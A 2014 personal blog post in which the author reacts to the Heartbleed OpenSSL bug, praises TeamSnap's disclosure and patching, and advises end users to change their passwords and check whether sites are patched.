John Galea's Blog

Just another WordPress.com weblog

Heartbleed bug

Everyone including me (personally and professionally) are scrambling to figure out what to do about this latest bug. If you live on another planet maybe you haven’t heard but a bug in OpenSSL has become common knowledge (the bug has existed for about 2-3 years) that allows hackers to gain access to private users information. Credit card, address, SIN numbers you name it. Frankly there is only so much you can do. But you have to start somewhere as an end user. The main issue IMHO is that companies are not being forth coming with whether they were exposed and what they have done. The main thing you can do is change your passwords. If you use a common password and only one of your sites becomes compromised all of your logons are compromised. But there is no point changing your password until the site itself has taken steps. One of the more proactive sites of all of the organizations I logon to is TeamSnap. They stepped up and here is what they said:

1) “To our knowledge, there were no attacks to TeamSnap or its stored data.” Frankly the bug does not leave behind logs so knowing they were attacked and lost data is not as easy as one might otherwise think

2) “The OpenSSL folks have already put out a fix, which has been picked up widely. On the TeamSnap side, we found out about the bug — and the fix — when it was announced and immediately went into action. We checked to make sure all of our servers had the fix, we contacted our tech partners to make sure they knew about the bug and were also adopting the fix, and we revoked our previous security certificate and private key and issued new ones.” This is exactly what needs to be done to plug the hole. All of these steps are necessary

But the reality is all this does is stop future leaks and does nothing to remediate already lost data, because really nothing can be done.

3) “Despite the fact that we don’t think TeamSnap information was compromised, we highly suggest users to change their TeamSnap password.”

Kudos to TeamSnap. That’s the way every company should behave in a situation like this.

Yup changing your password especially to any web site that you care about, has personal info, credit card etc is crucial. And wherever practical use different passwords. But it also helps to know if the site has fixed itself as teamsnap did above. If you can’t find out (because the reality is companies are hiding the facts because they don’t want to admit they were exposed, and are using open source FREE software) there are a few test web sites out there you can use that will checkout if the site is now patched. Checkout fillipio and lastpass. Now I can’t give any info as to whether these sites work or are accurate but at least it’s something to do.

You can also check Mashable and other such summaries telling who was and was not exposed. Well that’s about it. I can only imagine how many identity thefts are going to come out of this mess.

Advertisements

April 16, 2014 - Posted by | Uncategorized

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: